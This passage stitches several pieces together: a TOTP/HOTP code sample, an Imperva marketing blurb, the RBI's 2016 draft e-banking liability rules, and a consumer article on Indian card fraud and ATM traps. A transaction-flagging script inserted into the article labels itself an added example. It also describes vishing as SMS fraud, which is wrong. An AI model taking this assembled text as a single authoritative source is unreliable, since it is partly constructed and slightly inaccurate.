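    'dynamic truncation' that turns 20 bytes of MAC into a short decimal code."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return "%0*d" % (digits, code % 10 ** digits)


def totp(secret, unix_time=None, step=30, digits=6):
    """RFC 6238: HOTP whose counter is the number of 30-second steps since epoch."""
    t = int(time.time() if unix_time is None else unix_time)
    return hotp(secret, t // step, digits)


def verify_totp(secret, code, unix_time=None, step=30, window=1):
    """Server-side check accepting the current step and one either side (clock
    skew); constant-time comparison so timing does not leak matching digits."""
    t = int(time.time() if unix_time is None else unix_time)
    return any(hmac.compare_digest(totp(secret, t + k * step, step), code)
               for k in range(-window, window + 1))


def provisioning_uri(secret, account, issuer):
    """otpauth:// URI that authenticator apps import, usually from a QR code."""
    b32 = base64.b32encode(secret).decode().rstrip("=")
    return "otpauth://totp/%s:%s?secret=%s&issuer=%s" % (issuer, account, b32, issuer)


# RFC 6238 test-vector secret (SHA-1 variant). A real deployment generates a
# random secret per user and stores it server-side.
RFC_SECRET = b"12345678901234567890"
```

Note what this does and does not protect against: the code proves possession of the secret, so a password copied from a fake login page is useless by itself, but a proxy that forwards the victim's password and current code to the real site within the 30-second window still gets in. That window is why the FIDO2/WebAuthn keys mentioned above, which sign a challenge bound to the site's origin, are the phishing-resistant option.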

PHISHING PROTECTION FROM IMPERVA INCAPSULA

Imperva Incapsula offers a combination of access management and web application security solutions to counter phishing attempts:
  • Incapsula Login Protect lets you deploy 2FA protection for URL addresses in your website or web application. This includes addresses having URL parameters or AJAX pages, where 2FA protection is normally harder to implement. The solution can be deployed in seconds with just a few clicks of a mouse. It doesn’t require any hardware or software installation and enables easy management of user roles and privileges directly from your Incapsula dashboard.
  • Working within the cloud, Incapsula Web Application Firewall (WAF) blocks malicious requests at the edge of your network. This includes preventing malware injection attempts by compromised insiders in addition to reflected XSS attacks deriving from a phishing episode.

E-banking fraud: What’s your liability?

According to the Reserve Bank of India (RBI) draft guidelines issued on August 11, 2016, the burden of proving customer liability in an unauthorised e-banking transaction lies with the bank. Find out when you incur nil or limited liability. 

When is it zero liability? 
The bank will reimburse the customer if there is: 
a Fraud/negligence on the part of the bank, whether or not you report the fraud/loss. 

b Third party breach, where the fault lies neither with the bank nor with the customer, but elsewhere in the system, and the customer notifies the bank within three working days of receiving the communication from the bank regarding an unauthorised transaction. 

When is it limited liability? 
The customer is partially liable if: 
a It involves negligence on his part, like sharing payment credentials. In such a case, he will bear the entire loss until he reports the unauthorised transaction to the bank. Any loss after reporting will be borne by the bank. 

b The fault lies neither with the bank nor with the customer but in the system and there is a delay of four to seven working days by the customer in notifying the bank. The customer liability shall be limited to the transaction value or Rs 5,000, whichever is lower. 



Credit, debit card frauds and how you can avoid them

Even as the RBI and banks are introducing several security features, customers need to take the initiative to prevent being conned.
On 19 October, the country woke up to a banking nightmare. The State Bank of India (SBI) blocked 6 lakh debit cards after a reported malware-related breach in a non-SBI ATM network. In what is possibly India’s largest financial data breach, nearly 32 lakh debit cards across 19 banks, including HDFC Bank, ICICI Bank and Axis Bank, were compromised. As per the National Payments Corporation of India (NPCI), 90 ATMs were impacted and at least 641 customers lost Rs 1.3 crore in fraudulent transactions.

Even as the PCI Security Standards Council, the international body that maintains the Payment Card Industry Data Security Standard (PCI DSS), has ordered a forensic audit, banks have advised their customers to change their PINs and to use only their own bank's ATMs. The customers, meanwhile, are worried about how secure their debit and credit cards really are.

It’s a justified concern, considering that nearly 2.59 crore credit cards issued by 56 banks had a transaction worth Rs 24,341 crore via points of sale (POS) and Rs 202 crore through ATMs, while 69.72 crore debit cards registered transactions worth Rs 2.19 lakh crore through ATMs and Rs 17,100 crore via POS in July 2016. This is a fortune that fraudsters are waiting to tap into through several, ready loopholes. “Banks are definitely revisiting their network security by applying additional layers of security to prevent any compromise,” says Rajiv Anand, Executive Director, Axis Bank. 

Even as the RBI and banks are trying to stay one step ahead by introducing several security features, including chip-based cards and two-factor authentication, customers need to take the initiative to prevent being conned. We list here the various ways that cards, credit and debit, can be used to commit fraud and steps you can take to steer clear of these. 

HOW YOU CAN BE DUPED 
Card fraud basically involves theft of identity or information on your cards. This information is then used to make ATM withdrawals or conduct online or offline transactions. The stealing can take place in one of the following ways: 

Automated Teller Machines (ATMs) 
The machines have become a favoured target of scamsters (see 5 traps set up by fraudsters at the ATM ). Ask Mumbai-based Rupali Pandagale (see below), who went for cash withdrawal to another bank’s ATM. “I put the card in one of the machines, but it wasn’t working. So I took out Rs 2,500 from the other machine and left. Five minutes later, I got an alert saying another Rs 10,000 had been withdrawn,” she says. 

Rupali Pandagale 
29 years 
Salaried, Mumbai 
Fraud: ATM withdrawal from other bank machine. 
"I inserted my card in one machine, but it wasn't working. I withdrew Rs 2,500 from the other machine and left. Five minutes later, I got an alert that Rs 10,000 had been withdrawn." 
When: February 2016. 
Amount: Rs 10,000. 
What did she do? 
"I contacted both the banks and asked for video footage, but they refused to share it with me. They insist I conducted the transaction and have failed to remit the amount." 
Current status: Unresolved. 

There are various techniques fraudsters use to steal your card information: 
*Skimming: “This technique involves attaching a data skimming device in the card reader slot to copy information from the magnetic strip when one swipes the card,” says Mohan Jayaraman, Managing Director, Experian India. “They also set up cameras near the machine to get the PIN,” he adds. 

*Card trapping: A barb fitted inside the card slot retains the card when you insert it in the machine; the fraudster retrieves the card later, once you have left. 

*Shoulder surfing: If you find friendly bystanders in the room or outside who try to help you if your card gets stuck or peer over your shoulder, beware. They are there to get you to reveal your PIN. 

*Leaving card/PIN: If you write your PIN on the card and forget it in the ATM kiosk or the machine, it’s a virtual invite to be scammed. 

Online transactions 
The ease of e-shopping or online bill payment is matched by the ease with which identity theft can be carried out on a computer or smartphone. The stolen details can then be used for unauthorised transactions. Mumbai-based Girish Peswani (see below) knows it well. “I was in my office when I got alerts about online transactions abroad made using my credit card,” he says. There are various ways this credit card information could have been stolen from Peswani. 

Girish Peswani 
44 years 
IT consultant, Mumbai 
Fraud: Illegal online transactions. 
"I was in my office when I got two alerts showing online transactions on my card in The Netherlands and Australia." 
When: August 2014. 
Amount: Rs 12,000. 
What did he do? 
"I blocked the card and contacted the bank. They asked me to get a new card. I asked them to resolve the issue first, but they continue to send me credit bills for the amount spent and a huge interest amount too." 
Current status: Unresolved. 

*Pharming: In this technique, fraudsters reroute you to a fake website that seems similar to the original. So even as you conduct transactions and make payment via credit or debit card, the card details can be stolen. 

*Keystroke logging: Here, you unintentionally download software that allows the fraudster to record your keystrokes and steal passwords or credit card and Net banking details. 

*Public Wi-Fi: If you are used to carrying out transactions on your smartphone, public Wi-Fi makes for a good hacking opportunity for thieves to steal your card details. 

*Malware: This is malicious software that can compromise computer systems at ATMs or bank servers and allows fraudsters to access confidential card data. 

Merchant or point-of-sale theft 
This is perhaps the simplest and most effective form of theft, wherein your card is taken by the salesperson for swiping and the information from the magnetic strip is copied to be used later for illegal transactions. 

Phishing & vishing 
While phishing involves identity theft through spam mails that seem to come from a genuine source, vishing is essentially the same thing carried out over a mobile phone using messages or SMS. Both trick you into revealing your password, PIN or account number. 

SIM swap fraud 
Here the fraudster contacts your mobile operator with fake identity proof and gets a duplicate SIM card. The operator deactivates your original SIM, and the thief then receives the one-time passwords (OTPs) sent to your number and uses them to conduct online transactions. 

Unsafe apps 
Mobile apps from sources other than established app stores can gain access to information on your phone, such as passwords, and use it for unauthorised transactions. 

Lost or stolen cards, interception 
This is the oldest form of theft, wherein transactions are carried out using stolen cards, those intercepted from mail before they reach the owner from the card issuer, or by fishing out information like PINs and passwords from trash bins. 

Cards using other documents 
This is also an easy form of identity theft, where new cards are made by the fraudster using personal information that is stolen from application forms or other lost or discarded documents. 

HOW TO PREVENT FRAUD 
Some basic, preventive steps can ensure that you do not fall prey to credit or debit card fraud. Here’s how: 
ATM safeguards 
“Stay away from ATMs that appear dirty or in disrepair. They may not work or, worse, may be fake machines set to capture your card information,” warns Navroze Dastur, Managing Director, NCR India, a financial security solutions firm. Here are some other things you should keep in mind: 
*Check machine: “Do not use ATMs with unusual signage, such as a command to enter your PIN twice to complete the transaction,” says Dastur. “Also watch out for machines that appear to have been altered, for instance if the front looks crooked, loose or damaged. It could be a sign that someone has attached a skimming device,” he adds. 

*Cover keypad: Make sure to cover the keypad with your hand while entering the PIN to escape any cameras attached nearby. 

*Don’t take help: It is advisable to use only your own bank ATMs, particularly those attached to a bank branch and those that have security guards. Also, avoid taking the help of any person loitering outside the ATM or volunteering to assist you if you get stuck.

Online precautions 
*Use safe sites: Go only to well-known, established sites for e-shopping. “Remember to confirm the site’s legitimacy before using it and shop only on those that are Secure Sockets Layer (SSL)-certified. These can be identified through the lock symbol next to the browser’s URL box,” says Porush Singh, Country Corporate Officer, India & Division President, South Asia, Mastercard. 

Also make sure that the website uses the ‘https’ protocol instead of ‘http’, where ‘s’ stands for ‘secure’. Additionally, make sure not to click on the option that asks for saving your card details on any site. 

“You should also look out for a site’s payment verification tools, such as MasterCard’s SecureCode, which verifies that you authorised the payment while protecting the privacy of your online transaction,” says Singh. 

*Anti-virus software: While banks deploy ATM network security measures, on an individual level you can safeguard transactions by installing anti-virus software on your computer and smartphone to keep out malware. “You can also install identity theft detection apps on your phone from an official app store,” says Jayaraman of Experian. Also install software on your smartphone that lets you wipe its data remotely in case the phone is stolen. 

*Debit card: Make sure that you do not use your debit card for e-commerce transactions. This is because if your card is compromised, the entire cash in your bank account can be wiped out instantly. The credit card, on the other hand, offers a month’s grace period before the cash leaves your account, during which the investigation can possibly nail the fraud. 

*Hide CVV: When you enter the CVV on the site, it should be masked by asterisks. This is especially important while shopping on foreign websites where the CVV is the only point of verification. Also use a virtual keyboard to avoid keystroke logging. 

*Public Wi-Fi: “Customers must avoid using unsecured Wi-Fi networks or public Wi-Fi as these are easy targets for identity theft cases in online transactions,” says Anand of Axis Bank. 

*Register for alerts: This is a very important step since the bank will alert you to any online card transaction or ATM withdrawals the moment these take place. Also remember to update your mobile contact number in case of a change. 

*Log out: “Always log out from social media sites and other online accounts to ensure data security and avoid storing confidential passwords on your mobile phones as these can be used by fraudsters,” says Jayaraman. 

*Change passwords: Keep changing your passwords from time to time to reduce the probability of identity theft. 

*Virtual cards: You can use this prepaid card if you are not a frequent shopper. It is a limited debit card that does not provide the primary card information to the merchant and expires after a day or 48 hours. 

Offline preventive measures 
Here are some additional precautions you can take to ensure your card is safe. 
*Don’t disclose details: Never reveal your PIN, CVV or password to anyone. Make sure not to respond to e-mails or SMSes that ask for crucial personal or card-related details. No bank or credit card firm is authorised to seek card details from customers on mail or through phone. 

*Check statements: Regularly go through your bank or credit card statements so that you can detect any unauthorised transaction through identity theft and alert the bank immediately. 

*Merchants & POS: At shops or petrol pumps, make sure that the card is not taken by the salesperson to a remote location where you cannot see it as the card information can be easily copied and stolen. Also, try shopping with retailers that use chip-enabled card readers. Though not every merchant has such readers, this provision can help bring down the risk of fraudulent card activity significantly. 

*Don’t sign blank receipts: Ensure that you never sign a blank receipt, and mark through any blank lines or spaces before signing so that nobody can add an additional amount to your transaction. 
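The “register for alerts” and “check statements” advice above amounts to looking for the two patterns in the Pandagale and Peswani cases: a second ATM withdrawal at a different machine minutes after the first, and online purchases abroad on a card otherwise used at home. The following is an added example of that check written in Python (not code from the article, any bank or the RBI); the statement rows, terminal ids, the 15-minute window and the home-country rule are constructed assumptions.

```python
from datetime import datetime, timedelta

# Constructed sample statement, loosely modelled on the two cases in the article.
# Not real customer data; terminal ids are made up.
SAMPLE_STATEMENT = [
    {"time": "2016-02-10 18:02", "channel": "ATM", "terminal": "ATM-MUM-0417", "country": "IN", "amount": 2500},
    {"time": "2016-02-10 18:07", "channel": "ATM", "terminal": "ATM-MUM-0981", "country": "IN", "amount": 10000},
    {"time": "2016-02-11 09:30", "channel": "POS", "terminal": "POS-MUM-2210", "country": "IN", "amount": 1200},
    {"time": "2016-02-11 09:41", "channel": "ONLINE", "terminal": "WEB", "country": "NL", "amount": 7000},
    {"time": "2016-02-11 09:43", "channel": "ONLINE", "terminal": "WEB", "country": "AU", "amount": 5000},
]


def flag_suspicious(txns, atm_window_minutes=15, home_country="IN"):
    """Return (time, reason) pairs for transactions worth an immediate call to the bank.

    Rule 1: an ATM withdrawal at a different terminal within `atm_window_minutes`
            of the previous ATM withdrawal (the Pandagale pattern).
    Rule 2: an online transaction outside `home_country` (the Peswani pattern).
    Both thresholds are assumptions chosen for this example, not bank policy.
    """
    rows = sorted(
        (dict(t, dt=datetime.strptime(t["time"], "%Y-%m-%d %H:%M")) for t in txns),
        key=lambda t: t["dt"],
    )
    flags = []
    last_atm = None
    for t in rows:
        if t["channel"] == "ATM":
            if last_atm is not None and t["terminal"] != last_atm["terminal"]:
                gap = t["dt"] - last_atm["dt"]
                if gap <= timedelta(minutes=atm_window_minutes):
                    flags.append((t["time"], f"ATM withdrawal of Rs {t['amount']} at {t['terminal']} "
                                             f"{int(gap.total_seconds() // 60)} min after one at {last_atm['terminal']}"))
            last_atm = t
        elif t["channel"] == "ONLINE" and t["country"] != home_country:
            flags.append((t["time"], f"online transaction of Rs {t['amount']} in {t['country']}, "
                                     f"card is normally used in {home_country}"))
    return flags


if __name__ == "__main__":
    for when, reason in flag_suspicious(SAMPLE_STATEMENT):
        print(when, "-", reason)
```

Run against a real statement export, the same loop is a cheap way to turn the bank's transaction alerts into a list of items to dispute within the reporting window the RBI rules describe.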

WHAT TO DO IF CHEATED 
In case of card identity theft or a fraudulent offline or online transaction, report the loss immediately to the bank or card provider and have the card blocked. For this, make sure that you have the customer care number of your bank handy. Follow it up with a letter or e-mail. It is also advisable to lodge an FIR at the earliest. 

If the bank does not respond within a week, approach the nodal officer. If there is no response from the bank within 30 days, contact the banking ombudsman appointed by the RBI ( https://www.rbi.org.in/commonman/English/Scripts/Against-BankABO.aspx ). If this measure too fails, approach a court of law for redressal. 


5 TRAPS SET BY FRAUDSTERS AT THE ATM 

1. Hidden camera 
Tiny, pinhole cameras may be placed on the machine or even the roof at strategic positions to capture your PIN. 

2. Card skimmer 
These devices are installed on the card reader slot to either copy the information from the magnetic strip of your card or steal the card itself. 
*Bulky slot: If the slot feels slightly bulky or misaligned, in all probability an additional card reader slot has been placed on top of the actual one. 

*Loose slot: If the slot is wobbly or loose, it indicates the presence of a ‘Lebanese loop’, a small plastic device with a barb that holds your card back in the machine. You may think the machine has swallowed your card or that it is stuck. 

3. Shoulder surfers 
These are people lurking in the ATM room or outside. They will either peer over your shoulder to read your PIN or offer help if your card is stuck. 

4. False front 
It may be a little difficult to detect as the fake front completely covers the original machine because it is installed on top of it. This allows fraudsters to take your PIN as well as money. 

5. Fake keypad 
This is placed on top of the actual keypad. If the keypad feels spongy to touch or loose, don’t enter your PIN. 
